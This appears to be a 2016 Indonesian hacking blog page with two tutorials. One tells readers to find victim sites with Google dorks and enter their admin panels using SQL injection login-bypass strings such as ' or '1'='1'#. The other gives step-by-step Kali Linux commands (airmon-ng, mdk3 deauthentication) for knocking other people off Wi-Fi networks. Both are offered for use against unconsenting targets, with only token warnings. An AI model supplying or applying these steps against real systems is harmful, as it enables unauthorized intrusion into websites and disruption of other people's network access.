Jika sudah semuanya coba kawan jalankan! Semoga berhasil dan mohon maaf jika ada banyak kesalah ya kawan! Sekian saya ucapkan terima kasih. Salam Coder ^_^






Note: Jika terdapat error atau pertanyaan silahkan comment dibawa atau bisa email saya ke anwaru@yandex.com terima kasih

freebitcoin


Selasa, 01 November 2016

How To Bypass Admin or User Login


How To Bypass Admin or User Login


Yap, sesuai judul dari artikel ini. Admin mau berbagi sebuat tutorial " How To Bypass Admin or User Login ", walau tutorial ini sudah banyak di tulis di blog - blog lain maupun forum tetapi saya hanya ingin berbagi saja. oke langsung ajah

Pertama kita cari target dengan google dork. Use your brain Borther ^_^.

Jika sudah mendapatkan target mari kita exploit, coba dengan beberapa user dan password berikut untuk bypass atau inject target!
Username: 'or' '='
Password: 'or' '='
atau
Username:  ' or '1'='1'#
Password:   ' or '1'='1'#

Perhatikan screenshot berikut!



Yeahhh. dari screenshot di atas admin berhasil masuk ke dalam web tersebut. Sisa kawan bisa lanjutkan dan jangan lupa beritahu admin web tersebut untuk patch webnya ya ^_^
Baca Juga
Cara Fix Login Yang Bisa Di Bypass

Note: Tidak semua login form bisa di bypass, itu tergantung kesalahan developer web tersebut!

If you like this post and blog please shared it, we can still update!

freebitcoin


Kamis, 27 Oktober 2016

Kali Linux - MDK3 Tutorial

Disconneted Other Connection with MDK3 On Kali Linux

This Tutorial using Englis language and from my old blog
Lets Begin and See tutoria!

Note:  Be careful to use it if you do not want to face another issue!

Author : Aihara Anwaru
Team : Falcon-G21 Team Dark
Tested OS : Kali Linux 3.14-kali1 - amd64


First
Open Terminal
Type " airmon-ng "
Press Enter on keyboard
withoun > " <


 next
Type " airmon-ng start wlan0 "
Press Enter
withoun > " <


 next
Type " echo your mac adrees >> whitelist.txt "
Note : if you not know you mac address see used ifconfig

example : my mac address is => 48:d2:24:6f:69:ea
echo 48:d2:24:6f:69:ea >> whitelist.txt
file : whitelist.txt you can change name with other name do you like ^_^
if you finised add you mac address to white list
 

 next
Type mdk3 mon0 d -w whitelist.txt
Press Enter for start and you see other connection is disconnected ^_^





Thanks ^_^
Good Luck! Be careful to use it if you do not want to face another issue!

freebitcoin